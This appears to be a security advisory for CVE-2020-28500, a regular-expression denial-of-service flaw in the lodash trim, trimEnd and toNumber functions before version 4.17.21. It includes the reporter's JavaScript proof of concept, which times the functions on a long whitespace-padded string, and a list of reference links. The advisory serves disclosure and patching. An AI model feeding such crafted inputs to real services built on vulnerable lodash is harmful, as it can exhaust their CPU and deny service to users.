All versions of package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber
, trim
and trimEnd
functions.
Steps to reproduce (provided by reporter Liyuan Chen):
var lo = require('lodash');
function build_blank(n) {
var ret = "1"
for (var i = 0; i < n; i++) {
ret += " "
}
return ret + "1";
}
var s = build_blank(50000) var time0 = Date.now();
lo.trim(s)
var time_cost0 = Date.now() - time0;
console.log("time_cost0: " + time_cost0);
var time1 = Date.now();
lo.toNumber(s) var time_cost1 = Date.now() - time1;
console.log("time_cost1: " + time_cost1);
var time2 = Date.now();
lo.trimEnd(s);
var time_cost2 = Date.now() - time2;
console.log("time_cost2: " + time_cost2);
cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf
github.com/lodash/lodash
github.com/lodash/lodash/blob/npm/trimEnd.js%23L8
github.com/lodash/lodash/commit/c4847ebe7d14540bb28a8b932a9ce1b9ecbfee1a
github.com/lodash/lodash/pull/5065
github.com/lodash/lodash/pull/5065/commits/02906b8191d3c100c193fe6f7b27d1c40f200bb7
nvd.nist.gov/vuln/detail/CVE-2020-28500
security.netapp.com/advisory/ntap-20210312-0006
snyk.io/vuln/SNYK-JAVA-ORGFUJIONWEBJARS-1074896
snyk.io/vuln/SNYK-JAVA-ORGWEBJARS-1074894
snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1074892
snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074895
snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1074893
snyk.io/vuln/SNYK-JS-LODASH-1018905
www.oracle.com//security-alerts/cpujul2021.html
www.oracle.com/security-alerts/cpujan2022.html
www.oracle.com/security-alerts/cpujul2022.html
www.oracle.com/security-alerts/cpuoct2021.html